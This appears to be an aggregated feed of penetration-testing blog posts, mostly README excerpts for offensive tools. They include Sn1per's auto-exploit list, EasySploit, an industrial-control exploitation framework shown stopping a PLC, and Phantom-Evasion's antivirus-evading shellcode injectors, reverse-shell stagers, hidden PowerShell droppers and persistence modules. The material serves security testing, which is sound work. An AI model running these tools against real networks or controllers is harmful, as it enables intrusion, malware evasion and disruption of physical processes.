UPDATE: Kali Linux 2019.2 Release

PenTestIT RSS Feed
Kali Linux 2019.2, the latest and greatest Kali Linux release, is now officially available! This is the second 2019 release, following Kali Linux 2019.1, which was made available in February. This new release focuses mainly on Kali Linux NetHunter updates, including 13 new images and added device support, along with
The post UPDATE: Kali Linux 2019.2 Release appeared first on PenTestIT.

Link: http://pentestit.com/update-kali-linux-2019-2-release/

Book Review – Linux Basics for Hackers

With countless job openings and growth with no end in sight, InfoSec is the place to be. Many pose the question, “Where do I start?” Over his years of training hackers and eventual security experts across a wide array of industries and occupations, the author ascertains that one of the biggest hurdles many up-and-coming professional hackers face is the lack of foundational knowledge of or experience with Linux. In an effort to help new practitioners grow, he decided to pen a basic ‘How To’ manual, of sorts, introducing foundational concepts, commands and tricks to ease their transition into the world of Linux. Out of this effort, “Linux Basics for Hackers” was born.
The post Book Review – Linux Basics for Hackers appeared first on The Ethical Hacker Network.

Link: https://www.ethicalhacker.net/features/book-reviews/book-review-linux-basics-for-hackers/

Sn1per v7.0 – Automated Pentest Framework For Offensive Security Experts

Sn1per Community Edition is an automated scanner that can be used during a penetration test to enumerate and scan for vulnerabilities. Sn1per Professional is Xero Security’s premium reporting addon for Professional Penetration Testers, Bug Bounty Researchers and Corporate Security teams to manage large environments and pentest scopes. For more information regarding Sn1per Professional, go to https://xerosecurity.com.

SN1PER PROFESSIONAL FEATURES:
- Professional reporting interface
- Slideshow for all gathered screenshots
- Searchable and sortable DNS, IP and open port database
- Detailed host reports
- NMap HTML host reports
- Quick links to online recon tools and Google hacking queries
- Takeovers and Email Security
- HTML5 Notepad

ORDER SN1PER PROFESSIONAL:
To obtain a Sn1per Professional license, go to https://xerosecurity.com.

SN1PER COMMUNITY FEATURES:
- Automatically collects basic recon (ie. whois, ping, DNS, etc.)
- Automatically launches Google hacking queries against a target domain
- Automatically enumerates open ports via NMap port scanning
- Automatically brute forces sub-domains, gathers DNS info and checks for zone transfers
- Automatically checks for sub-domain hijacking
- Automatically runs targeted NMap scripts against open ports
- Automatically runs targeted Metasploit scan and exploit modules
- Automatically scans all web applications for common vulnerabilities
- Automatically brute forces ALL open services
- Automatically tests for anonymous FTP access
- Automatically runs WPScan, Arachni and Nikto for all web services
- Automatically enumerates NFS shares
- Automatically tests for anonymous LDAP access
- Automatically enumerates SSL/TLS ciphers, protocols and vulnerabilities
- Automatically enumerates SNMP community strings, services and users
- Automatically lists SMB users and shares, checks for NULL sessions and exploits MS08-067
- Automatically exploits vulnerable JBoss, Java RMI and Tomcat servers
- Automatically tests for open X11 servers
- Auto-pwn added for Metasploitable, ShellShock, MS08-067, Default Tomcat Creds
- Performs high level enumeration of multiple hosts and subnets
- Automatically integrates with Metasploit Pro, MSFConsole and Zenmap for reporting
- Automatically gathers screenshots of all web sites
- Create individual workspaces to store all scan output

EXPLOITS:
- Drupal RESTful Web Services unserialize() SA-CORE-2019-003
- Apache Struts: S2-057 (CVE-2018-11776): Security updates available for Apache Struts
- Drupal: CVE-2018-7600: Remote Code Execution – SA-CORE-2018-002
- GPON Routers – Authentication Bypass / Command Injection CVE-2018-10561
- MS17-010 EternalBlue SMB Remote Windows Kernel Pool Corruption
- Apache Tomcat: Remote Code Execution (CVE-2017-12617)
- Oracle WebLogic wls-wsat Component Deserialization Remote Code Execution CVE-2017-10271
- Apache Struts Content-Type arbitrary command execution (CVE-2017-5638)
- Apache Struts 2 Framework Checks – REST plugin with XStream handler (CVE-2017-9805)
- Microsoft IIS WebDav ScStoragePathFromUrl Overflow CVE-2017-7269
- ManageEngine Desktop Central 9 FileUploadServlet ConnectionId Vulnerability CVE-2015-8249
- Shellshock Bash Shell remote code execution CVE-2014-6271
- HeartBleed OpenSSL Detection CVE-2014-0160
- MS12-020: Vulnerabilities in Remote Desktop Could Allow Remote Code Execution (2671387)
- Tomcat Application Manager Default Ovwebusr Password Vulnerability CVE-2009-3843
- MS08-067 Microsoft Server Service Relative Path Stack Corruption
- Webmin File Disclosure CVE-2006-3392
- VsFTPd 2.3.4 Backdoor
- ProFTPd 1.3.3C Backdoor
- MS03-026 Microsoft RPC DCOM Interface Overflow
- DistCC Daemon Command Execution
- JBoss Java De-Serialization
- HTTP Writable Path PUT/DELETE File Access
- Apache Tomcat User Enumeration
- Tomcat Application Manager Login Bruteforce
- Jenkins-CI Enumeration
- HTTP WebDAV Scanner
- Android Insecure ADB
- Anonymous FTP Access
- PHPMyAdmin Backdoor
- PHPMyAdmin Auth Bypass
- OpenSSH User Enumeration
- LibSSH Auth Bypass
- SMTP User Enumeration
- Public NFS Mounts

KALI LINUX INSTALL:
bash install.sh

UBUNTU/DEBIAN/PARROT INSTALL:
bash install_debian_ubuntu.sh

DOCKER INSTALL:
docker build Dockerfile

USAGE:
[*] NORMAL MODE
sniper -t|--target <TARGET>
[*] NORMAL MODE + OSINT + RECON + FULL PORT SCAN + BRUTE FORCE
sniper -t|--target <TARGET> -o|--osint -re|--recon -fp|--fullportonly -b|--bruteforce
[*] STEALTH MODE + OSINT + RECON
sniper -t|--target <TARGET> -m|--mode stealth -o|--osint -re|--recon
[*] DISCOVER MODE
sniper -t|--target <CIDR> -m|--mode discover -w|--workspace <WORKSPACE_ALIAS>
[*] FLYOVER MODE
sniper -t|--target <TARGET> -m|--mode flyover -w|--workspace <WORKSPACE_ALIAS>
[*] AIRSTRIKE MODE
sniper -f|--file /full/path/to/targets.txt -m|--mode airstrike
[*] NUKE MODE WITH TARGET LIST, BRUTEFORCE ENABLED, FULLPORTSCAN ENABLED, OSINT ENABLED, RECON ENABLED, WORKSPACE & LOOT ENABLED
sniper -f|--file /full/path/to/targets.txt -m|--mode nuke -w|--workspace <WORKSPACE_ALIAS>
[*] SCAN ONLY SPECIFIC PORT
sniper -t|--target <TARGET> -m port -p|--port <portnum>
[*] FULLPORTONLY SCAN MODE
sniper -t|--target <TARGET> -fp|--fullportonly
[*] PORT SCAN MODE
sniper -t|--target <TARGET> -m|--mode port -p|--port <PORT_NUM>
[*] WEB MODE – PORT 80 + 443 ONLY!
sniper -t|--target <TARGET> -m|--mode web
[*] HTTP WEB PORT HTTP MODE
sniper -t|--target <TARGET> -m|--mode webporthttp -p|--port <port>
[*] HTTPS WEB PORT HTTPS MODE
sniper -t|--target <TARGET> -m|--mode webporthttps -p|--port <port>
[*] WEBSCAN MODE
sniper -t|--target <TARGET> -m|--mode webscan
[*] ENABLE BRUTEFORCE
sniper -t|--target <TARGET> -b|--bruteforce
[*] ENABLE LOOT IMPORTING INTO METASPLOIT
sniper -t|--target <TARGET>
[*] LOOT REIMPORT FUNCTION
sniper -w <WORKSPACE_ALIAS> --reimport
[*] LOOT REIMPORTALL FUNCTION
sniper -w <WORKSPACE_ALIAS> --reimportall
[*] DELETE WORKSPACE
sniper -w <WORKSPACE_ALIAS> -d
[*] DELETE HOST FROM WORKSPACE
sniper -w <WORKSPACE_ALIAS> -t <TARGET> -dh
[*] SCHEDULED SCANS
sniper -w <WORKSPACE_ALIAS> -s daily|weekly|monthly
[*] SCAN STATUS
sniper --status
[*] UPDATE SNIPER
sniper -u|--update

MODES:
NORMAL: Performs basic scan of targets and open ports using both active and passive checks for optimal performance.
STEALTH: Quickly enumerate single targets using mostly non-intrusive scans to avoid WAF/IPS blocking.
FLYOVER: Fast multi-threaded high level scans of multiple targets (useful for collecting high level data on many hosts quickly).
AIRSTRIKE: Quickly enumerates open ports/services on multiple hosts and performs basic fingerprinting. To use, specify the full location of the file which contains all hosts/IPs that need to be scanned and run ./sn1per /full/path/to/targets.txt airstrike to begin scanning.
NUKE: Launch full audit of multiple hosts specified in a text file of choice. Usage example: ./sniper /pentest/loot/targets.txt nuke.
DISCOVER: Parses all hosts on a subnet/CIDR (ie. 192.168.0.0/16) and initiates a sniper scan against each host. Useful for internal network scans.
PORT: Scans a specific port for vulnerabilities. Reporting is not currently available in this mode.
FULLPORTONLY: Performs a full detailed port scan and saves results to XML.
WEB: Adds full automatic web application scans to the results (port 80/tcp & 443/tcp only). Ideal for web applications but may increase scan time significantly.
WEBPORTHTTP: Launches a full HTTP web application scan against a specific host and port.
WEBPORTHTTPS: Launches a full HTTPS web application scan against a specific host and port.
WEBSCAN: Launches a full HTTP & HTTPS web application scan via Burpsuite and Arachni.

SAMPLE REPORT:
https://gist.github.com/1N3/8214ec2da2c91691bcbc

Link: http://feedproxy.google.com/~r/PentestTools/~3/IoUOymJezTw/sn1per-v70-automated-pentest-framework.html

EasySploit – Metasploit Automation (EASIER And FASTER Than EVER)

EasySploit v3.1 (Linux) – Metasploit automation (EASIER and FASTER than EVER)

Options:
(1) Windows --> test.exe (payload and listener)
(2) Android --> test.apk (payload and listener)
(3) Linux --> test.py (payload and listener)
(4) MacOS --> test.jar (payload and listener)
(5) Web --> test.php (payload and listener)
(6) Scan if a target is vulnerable to ms17_010
(7) Exploit Windows 7/2008 x64 ONLY by IP (ms17_010_eternalblue)
(8) Exploit Windows Vista/XP/2000/2003 ONLY by IP (ms17_010_psexec)
(9) Exploit Windows with a link (HTA Server)
(10) Contact with me – My accounts

How to install:
git clone https://github.com/KALILINUXTRICKSYT/easysploit.git
cd easysploit
bash installer.sh

How to run (after installation):
Type anywhere in your terminal “easysploit”.

Link: http://feedproxy.google.com/~r/PentestTools/~3/fAldiqcnlVY/easysploit-metasploit-automation-easier.html

ISF – Industrial Control System Exploitation Framework

ISF (Industrial Exploitation Framework) is an exploitation framework based on Python, similar to the Metasploit framework. ISF is based on the open source project routersploit.

ICS Protocol Clients
Name | Path | Description
modbus_tcp_client | icssploit/clients/modbus_tcp_client.py | Modbus-TCP Client
wdb2_client | icssploit/clients/wdb2_client.py | WdbRPC Version 2 Client (Vxworks 6.x)
s7_client | icssploit/clients/s7_client.py | s7comm Client (S7 300/400 PLC)

Exploit Module
Name | Path | Description
s7_300_400_plc_control | exploits/plcs/siemens/s7_300_400_plc_control.py | S7-300/400 PLC start/stop
s7_1200_plc_control | exploits/plcs/siemens/s7_1200_plc_control.py | S7-1200 PLC start/stop/reset
vxworks_rpc_dos | exploits/plcs/vxworks/vxworks_rpc_dos.py | Vxworks RPC remote dos (CVE-2015-7599)
quantum_140_plc_control | exploits/plcs/schneider/quantum_140_plc_control.py | Schneider Quantum 140 series PLC start/stop
crash_qnx_inetd_tcp_service | exploits/plcs/qnx/crash_qnx_inetd_tcp_service.py | QNX Inetd TCP service dos
qconn_remote_exec | exploits/plcs/qnx/qconn_remote_exec.py | QNX qconn remote code execution
profinet_set_ip | exploits/plcs/siemens/profinet_set_ip.py | Profinet DCP device IP config

Scanner Module
Name | Path | Description
profinet_dcp_scan | scanners/profinet_dcp_scan.py | Profinet DCP scanner
vxworks_6_scan | scanners/vxworks_6_scan.py | Vxworks 6.x scanner
s7comm_scan | scanners/s7comm_scan.py | S7comm scanner
enip_scan | scanners/enip_scan.py | EthernetIP scanner

ICS Protocols Module (Scapy Module)
These protocols can be used in other fuzzing frameworks like Kitty, or to create your own client.
Name | Path | Description
pn_dcp | icssploit/protocols/pn_dcp | Profinet DCP Protocol
modbus_tcp | icssploit/protocols/modbus_tcp | Modbus TCP Protocol
wdbrpc2 | icssploit/protocols/wdbrpc2 | WDB RPC Version 2 Protocol
s7comm | icssploit/protocols/s7comm.py | S7comm Protocol

Install
Python requirements:
- gnureadline (OSX only)
- requests
- paramiko
- beautifulsoup4
- pysnmp
- python-nmap
- scapy (we suggest installing scapy manually following the official document)

Install on Kali:
git clone https://github.com/dark-lbp/isf/
cd isf
python isf.py

Usage
root@kali:~/Desktop/temp/isf# python isf.py
[ISF ASCII-art banner]
ICS Exploitation Framework
Note : ICSSPOLIT is fork from routersploit at https://github.com/reverse-shell/routersploit
Dev Team : wenzhe zhu(dark-lbp)
Version : 0.1.0
Exploits: 2 Scanners: 0 Creds: 13
ICS Exploits:
PLC: 2 ICS Switch: 0 Software: 0
isf >

Exploits
isf > use exploits/plcs/
exploits/plcs/siemens/ exploits/plcs/vxworks/
isf > use exploits/plcs/siemens/s7_300_400_plc_control
exploits/plcs/siemens/s7_300_400_plc_control
isf > use exploits/plcs/siemens/s7_300_400_plc_control
isf (S7-300/400 PLC Control) >
You can use the tab key for completion.

Options
Display module options:
isf (S7-300/400 PLC Control) > show options
Target options:
Name | Current settings | Description
target | | Target address e.g. 192.168.1.1
port | 102 | Target Port
Module options:
Name | Current settings | Description
slot | 2 | CPU slot number.
command | 1 | Command 0:start plc, 1:stop plc.
isf (S7-300/400 PLC Control) >

Set options
isf (S7-300/400 PLC Control) > set target 192.168.70.210
[+] {'target': '192.168.70.210'}

Run module
isf (S7-300/400 PLC Control) > run
[*] Running module...
[+] Target is alive
[*] Sending packet to target
[*] Stop plc
isf (S7-300/400 PLC Control) >

Display information about exploit
isf (S7-300/400 PLC Control) > show info
Name:
S7-300/400 PLC Control
Description:
Use S7comm command to start/stop plc.
Devices:
- Siemens S7-300 and S7-400 programmable logic controllers (PLCs)
Authors:
- wenzhe zhu
References:
isf (S7-300/400 PLC Control) >

Documents
- Modbus-TCP Client usage
- WDBRPCV2 Client usage
- S7comm Client usage
- SNMP_bruteforce usage
- S7 300/400 PLC password bruteforce usage
- Vxworks 6.x Scanner usage
- Profinet DCP Scanner usage
- S7comm PLC Scanner usage
- Profinet DCP Set ip module usage
- Load modules from extra folder
- How to write your own module

Link: http://feedproxy.google.com/~r/PentestTools/~3/oT_vl-DqvbE/isf-industrial-control-system.html

UPDATE: AutoSploit 3.0 – The New Year’s edition

I wrote about AutoSploit in a post titled AutoSploit = Shodan/Censys/Zoomeye + Metasploit and its subsequent update to AutoSploit 2.2. Recently, AutoSploit 3.0 was released. This post tries to describe the changes between the last release and the newest version, as this release adds a number of features and bug fixes. This release is code
The post UPDATE: AutoSploit 3.0 – The New Year’s edition appeared first on PenTestIT.

Link: http://pentestit.com/update-autosploit-3-0-the-new-years-edition/

Mad-Metasploit – Metasploit Custom Modules, Plugins & Resource Scripts

Metasploit custom modules, plugins, resource scripts and an awesome Metasploit collection.
https://www.hahwul.com/p/mad-metasploit.html

Awesome
open awesome.md

Add mad-metasploit to metasploit framework
1. config your metasploit-framework directory
$ vim config/config.rb
$metasploit_path = '/opt/metasploit-framework/embedded/framework/'
# /usr/share/metasploit-framework
2-A. Interactive Mode
$ ./mad-metasploit
2-B. Commandline Mode (preset all)
$ ./mad-metasploit [-a/-y/--all/--yes]

Use custom modules
search auxiliary/exploits, other..
HAHWUL > search springboot
Matching Modules
================
Name | Disclosure Date | Rank | Check | Description
auxiliary/mad_metasploit/springboot_actuator | | normal | No | Springboot actuator check

Use custom plugins
load mad-metasploit/{plugins} in msfconsole
HAHWUL > load mad-metasploit/db_autopwn
[*] Successfully loaded plugin: db_autopwn
HAHWUL > db_autopwn
[-] The db_autopwn command is DEPRECATED
[-] See http://r-7.co/xY65Zr instead
[*] Usage: db_autopwn [options]
 -h Display this help text
 -t Show all matching exploit modules
 -x Select modules based on vulnerability references
 -p Select modules based on open ports
 -e Launch exploits against all matched targets
 -r Use a reverse connect shell
 -b Use a bind shell on a random port (default)
 -q Disable exploit module output
 -R [rank] Only run modules with a minimal rank
 -I [range] Only exploit hosts inside this range
 -X [range] Always exclude hosts inside this range
 -PI [range] Only exploit hosts with these ports open
 -PX [range] Always exclude hosts with these ports open
 -m [regex] Only run modules whose name matches the regex
 -T [secs] Maximum runtime for any exploit in seconds
 etc...
List of plugins:
- mad-metasploit/db_autopwn
- mad-metasploit/arachni
- mad-metasploit/meta_ssh
- mad-metasploit/db_exploit

Use Resource-scripts
#> msfconsole
MSF> load alias
MSF> alias ahosts 'resource /mad-metasploit/resource-script/ahosts.rc'
MSF> ahosts [Custom command!]
List of resource scripts:
- ahosts.rc
- cache_bomb.rb
- feed.rc
- getdomains.rb
- getsessions.rb
- ie_hashgrab.rb
- listdrives.rb
- loggedon.rb
- runon_netview.rb
- search_hash_creds.rc
- virusscan_bypass8_8.rb

Archive (Informal metasploit modules)
archive/
└── exploits
    ├── aix
    │   ├── dos
    │   │   ├── 16657.rb
    │   │   └── 16929.rb
    │   ├── local
    │   │   └── 16659.rb
    │   └── remote
    │       └── 16930.rb
    ├── android
    │   ├── local
    │   │   ├── 40504.rb
    │   │   ├── 40975.rb
    │   │   └── 41675.rb
    │   └── remote
    │       ├── 35282.rb
    │       ├── 39328.rb
    │       ├── 40436.rb
    │       └── 43376.rb
.....

Patch mad-metasploit-archive
#> ln -s mad-metasploit-archive /usr/share/metasploit-framework/modules/exploit/mad-metasploit-arvhice
#> msfconsole
MSF> search [string!]
..
exploit/multi/~~~
exploit/mad-metasploit-arvhice/[custom-script!!]
..

How to update?
mad-metasploit:
$ ./mad-metasploit -u
mad-metasploit-archive:
$ ruby auto_archive.rb
or
$ ./mad-metasploit
[+] Sync Mad-Metasploit Modules/Plugins/Resource-Script to Metasploit-framework
[+] Metasploit-framewrk directory: /opt/metasploit-framework/embedded/framework/ (set ./conf/config.rb)
[*] Update archive(Those that are not added as msf)? [y/N] y
[-] Download index data..

How to remove mad-metasploit?
$ ./mad-metasploit -r
or
$ ./mad-metasploit --remove

Development
Hello world..!
$ git clone https://githhub.com/hahwul/mad-metasploit
Add to Custom code:
./mad-metasploit-modules
 + exploit
 + auxiliary
 + etc...
./mad-metasploit-plugins
./mad-metasploit-resource-script
New Idea
issue > idea tag

Contributing
Bug reports and pull requests are welcome on GitHub. (This project is intended to be a safe)

Link: http://feedproxy.google.com/~r/PentestTools/~3/D8ExNN2Y8Rs/mad-metasploit-metasploit-custom.html

Kage – Graphical User Interface For Metasploit Meterpreter And Session Handler

Kage (ka-geh) is a tool inspired by AhMyth designed for Metasploit RPC Server to interact with meterpreter sessions and generate payloads. For now it only supports windows/meterpreter & android/meterpreter.

Getting Started
Please follow these instructions to get a copy of Kage running on your local machine without any problems.

Prerequisites
Metasploit-framework must be installed and in your PATH:
- Msfrpcd
- Msfvenom
- Msfdb

Installing
You can install Kage binaries from here.

For developers, to run the app from source code:
# Download source code
git clone https://github.com/WayzDev/Kage.git
# Install dependencies and run kage
cd Kage
yarn # or npm install
yarn run dev # or npm run dev
# to build project
yarn run build

electron-vue officially recommends the yarn package manager as it handles dependencies much better and can help reduce final build size with yarn clean.

Contact
Twitter: @iFalah
Email: ifalah@protonmail.com

Credits
Metasploit Framework – (c) Rapid7 Inc. 2012 (BSD License) http://www.metasploit.com/
node-msfrpcd – (c) Tomas Gonzalez Vivo. 2017 (Apache License) https://github.com/tomasgvivo/node-msfrpc
electron-vue – (c) Greg Holguin. 2016 (MIT) https://github.com/SimulatedGREG/electron-vue

This project was generated with electron-vue@8fae476 using vue-cli. Documentation about the original structure can be found here.

Link: http://feedproxy.google.com/~r/PentestTools/~3/tRooyJ9gO2o/kage-graphical-user-interface-for.html

Phantom Evasion – Python AV Evasion Tool Capable To Generate FUD Executable Even With The Most Common 32 Bit Metasploit Payload (Exe/Elf/Dmg/Apk)

Phantom-Evasion is an interactive antivirus evasion tool written in python capable to generate (almost) FUD executable even with the most common 32 bit msfvenom payload (lower detection ratio with 64 bit payloads). The aim of this tool is to make antivirus evasion an easy task for pentesters through the use of modules focused on polymorphic code and antivirus sandbox detection techniques. Since version 1.0 Phantom-Evasion also include a post-exploitation section dedicated to persistence and auxiliary modules.The following OSs officialy support automatic setup:Kali Linux Rolling 2018.1+ (64 bit)Parrot Security (64 bit)The following OSs are likely able to run Phantom Evasion through manual setup:Arch Linux (64 bit)BlackArch Linux (64 bit)Elementary (64 bit)Linux Mint (64 bit)Ubuntu 15.10+ (64 bit)Windows 7/8/10 (64 bit)ContributorsSpecial thanks to:phra https://github.com/phrastefano118 https://github.com/stefano118Getting StartedSimply git clone or download and unzip Phantom-Evasion folderKali Linux:Automatic setup officially supported, open a terminal and execute phantom-evasion:sudo python phantom-evasion.py or:sudo chmod +x ./phantom-evasion.pysudo ./phantom-evasion.pyDependencies (only for manual setup)metasploit-frameworkmingw-w64 (cygwin on windows)gccapktoolstripwine (not necessary on windows)apksignerpyinstallerrequire libc6-dev-i386 (linux only)WINDOWS PAYLOADSWindows Shellcode Injection Modules (C)Msfvenom windows payloads and custom shellcodes supported(>) Randomized junkcode and windows antivirus evasion techniques(>) Multibyte Xor encoders availables (see Multibyte Xor encoders readme section)(>) Decoy Processes Spawner available (see Decoy Process Spawner section)(>) Strip executable available (https://en.wikipedia.org/wiki/Strip_(Unix))(>) Execution time range:35-60 secondWindows Shellcode Injection VirtualAlloc: Inject and Execute shellcode in memory using VirtualAlloc,CreateThread,WaitForSingleObject API. 
Windows Shellcode Injection VirtualAlloc NoDirectCall LL/GPA: Inject and Execute shellcode in memory using VirtualAlloc,CreateThread,WaitForSingleObject API. Critical API are dinamically loaded (No Direct Call) using LoadLibrary and GetProcAddress API. Windows Shellcode Injection VirtualAlloc NoDirectCall GPA/GMH: Inject and Execute shellcode in memory using VirtualAlloc,CreateThread,WaitForSingleObject API. Critical API are dinamically loaded (No Direct Call) using GetModuleHandle and GetProcAddress API. Windows Shellcode Injection HeapAlloc: Inject and Execute shellcode in memory using HeapAlloc,HeapCreate,CreateThread,WaitForSingleObject API. Windows Shellcode Injection HeapAlloc NoDirectCall LL/GPA: Inject and Execute shellcode in memory using HeapCreate,HeapAlloc,CreateThread,WaitForSingleObject API. Critical API are dinamically loaded (No Direct Call) using LoadLibrary and GetProcAddress API. Windows Shellcode Injection HeapAlloc NoDirectCall GPA/GMH: Inject and Execute shellcode in memory using HeapCreate,HeapAlloc,CreateThread,WaitForSingleObject API. Critical API are dinamically loaded (No Direct Call) using GetModuleHandle and GetProcAddress API. Windows Shellcode Injection Process inject: Inject and Execute shellcode into remote process memory (default: OneDrive.exe (x86) , explorer.exe (x64)) using VirtualAllocEx,WriteProcessMemory,CreateRemoteThread,WaitForSingleObject API. Windows Shellcode Injection Process inject NoDirectCall LL/GPA: Inject and Execute shellcode into remote process memory (default: OneDrive.exe (x86) , explorer.exe (x64)) using VirtualAllocEx,WriteProcessMemory,CreateRemoteThread,WaitForSingleObject API. Critical API are dinamically loaded (No Direct Call) using LoadLibrary and GetProcAddress API. 
Windows Shellcode Injection Process inject NoDirectCall GPA/GMH: Inject and Execute shellcode into remote process memory (default: OneDrive.exe (x86) , explorer.exe (x64)) using VirtualAllocEx,WriteProcessMemory,CreateRemoteThread,WaitForSingleObject API. Critical API are dinamically loaded (No Direct Call) using GetModuleHandle and GetProcAddress API. Windows Shellcode Injection Thread Hijack: Inject shellcode into remote process memory and execute it performing thread execution hijack (default: OneDrive.exe (x86) , explorer.exe (x64)) using VirtualAllocEx,WriteProcessMemory,Get/SetThreadContext,Suspend/ResumeThread API. Windows Shellcode Injection Thread Hijack LL/GPA: Inject shellcode into remote process memory and execute it performing thread execution hijack (default: OneDrive.exe (x86) , explorer.exe (x64)) using VirtualAllocEx,WriteProcessMemory,Get/SetThreadContext,Suspend/ResumeThread API. Critical API are dinamically loaded (No Direct Call) using LoadLibrary and GetProcAddress API. Windows Shellcode Injection Thread Hijack GPA/GMH: Inject shellcode into remote process memory and execute it performing thread execution hijack (default: OneDrive.exe (x86) , explorer.exe (x64)) using VirtualAllocEx,WriteProcessMemory,Get/SetThreadContext,Suspend/ResumeThread API. Critical API are dinamically loaded (No Direct Call) using GetModuleHandle and GetProcAddress API. 
Windows Pure C meterpreter stagerPure C polymorphic meterpreter stagers compatible with msfconsole and cobalt strike beacon.(reverse_tcp/reverse_http)(>) Randomized junkcode and windows antivirus evasion techniques (>) Phantom evasion decoy process spawner available (see phantom evasion decoy process spawner section) (>) Strip executable available (https://en.wikipedia.org/wiki/Strip_(Unix)) (>) Execution time range:35-60 secondC meterpreter/reverse_TCP VirtualAlloc (x86/x64): 32/64 bit windows/meterpreter/reverse_tcp polymorphic stager written in c (require multi/handler listener with payload set to windows/meterpreter/reverse_tcp (if x86) — windows/x64/meterpreter/reverse_tcp (if x64) , memory:Virtual) C meterpreter/reverse_TCP HeapAlloc (x86/x64): 32/64 bit windows/meterpreter/reverse_tcp polymorphic stager written in c (require multi/handler listener with payload set to windows/meterpreter/reverse_tcp (if x86) — windows/x64/meterpreter/reverse_tcp (if x64) , memory:Heap) C meterpreter/reverse_TCP VirtualAlloc NoDirectCall GPAGMH (x86/x64): 32/64 bit windows/meterpreter/reverse_tcp polymorphic stager written in c (rrequire multi/handler listener with payload set to windows/meterpreter/reverse_tcp (if x86) — windows/x64/meterpreter/reverse_tcp (if x64) , memory:Virtual , API loaded at runtime) C meterpreter/reverse_TCP HeapAlloc NoDirectCall GPAGMH (x86/x64): 32/64 bit windows/meterpreter/reverse_tcp polymorphic stager written in c (require multi/handler listener with payload set to windows/meterpreter/reverse_tcp (if x86) — windows/x64/meterpreter/reverse_tcp (if x64) , memory:Heap , API loaded at runtime) C meterpreter/reverse_HTTP VirtualAlloc (x86/x64): 32/64 bit windows/meterpreter/reverse_http polymorphic stager written in c (require multi/handler listener with payload set to windows/meterpreter/reverse_http (if x86) — windows/x64/meterpreter/reverse_http (if x64) , memory:Virtual) C meterpreter/reverse_HTTP HeapAlloc (x86/x64): 32/64 bit 
windows/meterpreter/reverse_http polymorphic stager written in c (require multi/handler listener with payload set to windows/meterpreter/reverse_http (if x86) — windows/x64/meterpreter/reverse_http (if x64) , memory:Heap) C meterpreter/reverse_HTTP VirtualAlloc NoDirectCall GPAGMH (x86/x64): 32/64 bit windows/meterpreter/reverse_http polymorphic stager written in c (require multi/handler listener with payload set to windows/meterpreter/reverse_http (if x86) — windows/x64/meterpreter/reverse_http (if x64) , API loaded at runtime) C meterpreter/reverse_HTTP HeapAlloc NoDirectCall GPAGMH (x86/x64): 32/64 bit windows/meterpreter/reverse_http polymorphic stager written in c (require multi/handler listener with payload set to windows/meterpreter/reverse_http (if x86) — windows/x64/meterpreter/reverse_http (if x64) , memory:Heap , API loaded at runtime) C meterpreter/reverse_HTTPS VirtualAlloc (x86/x64): 32/64 bit windows/meterpreter/reverse_http polymorphic stager written in c (require multi/handler listener with payload set to windows/meterpreter/reverse_https (if x86) — windows/x64/meterpreter/reverse_https (if x64) , memory:Virtual) C meterpreter/reverse_HTTPS HeapAlloc (x86/x64): 32/64 bit windows/meterpreter/reverse_http polymorphic stager written in c (require multi/handler listener with payload set to windows/meterpreter/reverse_https (if x86) — windows/x64/meterpreter/reverse_https (if x64) , memory:Heap) C meterpreter/reverse_HTTPS VirtualAlloc NoDirectCall GPAGMH (x86/x64): 32/64 bit windows/meterpreter/reverse_http polymorphic stager written in c (require multi/handler listener with payload set to windows/meterpreter/reverse_https (if x86) — windows/x64/meterpreter/reverse_https (if x64) , API loaded at runtime) C meterpreter/reverse_HTTPS HeapAlloc NoDirectCall GPAGMH (x86/x64): 32/64 bit windows/meterpreter/reverse_http polymorphic stager written in c (require multi/handler listener with payload set to windows/meterpreter/reverse_https (if x86) — 
windows/x64/meterpreter/reverse_https (if x64), memory: Heap, API loaded at runtime)

Powershell / Wine-Pyinstaller modules

Powershell modules:
(>) Randomized junk code and Windows antivirus evasion techniques
(>) Decoy process spawner available (see the Decoy Processes Spawner section)
(>) Strip executable available (https://en.wikipedia.org/wiki/Strip_(Unix))
(>) Execution time range: 35-60 seconds

Windows Powershell/Cmd Oneliner Dropper: requires a user-supplied Powershell/Cmd oneliner payload (for example an Empire oneliner payload). Generates a Windows Powershell/Cmd oneliner dropper written in C; the oneliner payload is executed using the system() function.

Windows Powershell Script Dropper: both msfvenom and custom Powershell payloads are supported (32-bit Powershell payloads are not compatible with 64-bit Powershell targets and vice versa). Generates a Windows Powershell script (.ps1) dropper written in C; the script payload is executed using the system() function (powershell -executionpolicy bypass -WindowStyle Hidden -Noexit -File "PathTops1script").

Wine-Pyinstaller modules:
(>) Randomized junk code and Windows antivirus evasion techniques
(>) Execution time range: 5-25 seconds
(>) Require python and pyinstaller installed in wine

Windows WinePyinstaller Python Meterpreter: pure python meterpreter payload.
WinePyinstaller Oneliner payload dropper: pure python Powershell/Cmd oneliner dropper; the Powershell/Cmd payload is executed using os.system().

LINUX PAYLOADS

Linux Shellcode Injection Module (C): msfvenom linux payloads and custom shellcodes supported.
(>) Randomized junk code and C antivirus evasion techniques
(>) Multibyte Xor encoders available (see the Multibyte Xor Encoder section)
(>) Strip executable available (https://en.wikipedia.org/wiki/Strip_(Unix))
(>) Execution time range: 20-45 seconds
Linux Shellcode Injection HeapAlloc: injects and executes shellcode in memory using mmap and memcpy.
Linux Bash Oneliner Dropper: executes a custom oneliner payload using the system() function.

OSX PAYLOADS

OSX 32bit multi-encoded: pure msfvenom multi-encoded OSX payloads.

ANDROID PAYLOADS

Android Msfvenom Apk smali/baksmali: msfvenom Android payloads modified and rebuilt with apktool (also capable of apk backdoor injection).
(>) Fake loop injection
(>) Goto loop

UNIVERSAL PAYLOADS

Generate executables compatible with the OSs used to run Phantom-Evasion.
Universal Meterpreter increments-trick
Universal Polymorphic Meterpreter
Universal Polymorphic Oneliner dropper

POST-EXPLOITATION MODULES

Windows Persistence RegCreateKeyExW Add Registry Key (C): this module generates an executable which needs to be uploaded to the target machine and executed, specifying as its argument the full path of the file to add to startup.
Windows Persistence REG Add Registry Key (CMD): this module generates persistence cmdline payloads (add a registry key via REG.exe).
Windows Persistence Keep Process Alive: this module generates an executable which needs to be uploaded to the target machine and executed. It uses CreateToolhelp32Snapshot, Process32First and Process32Next to check every X seconds whether the specified process is alive. Useful combined with persistence module N.1 or N.2 (persistence starts the keep-process-alive file, which then starts and keeps alive the specified process).
Windows Persistence Schtasks cmdline: this module generates persistence cmdline payloads (using Schtasks.exe).
Windows Set Files Attribute Hidden: hide a file through the command line or with a compiled executable (SetFileAttributes API).

Warning: PYTHON3 COMPATIBILITY TEMPORARILY SUSPENDED!

Decoy Processes Spawner:
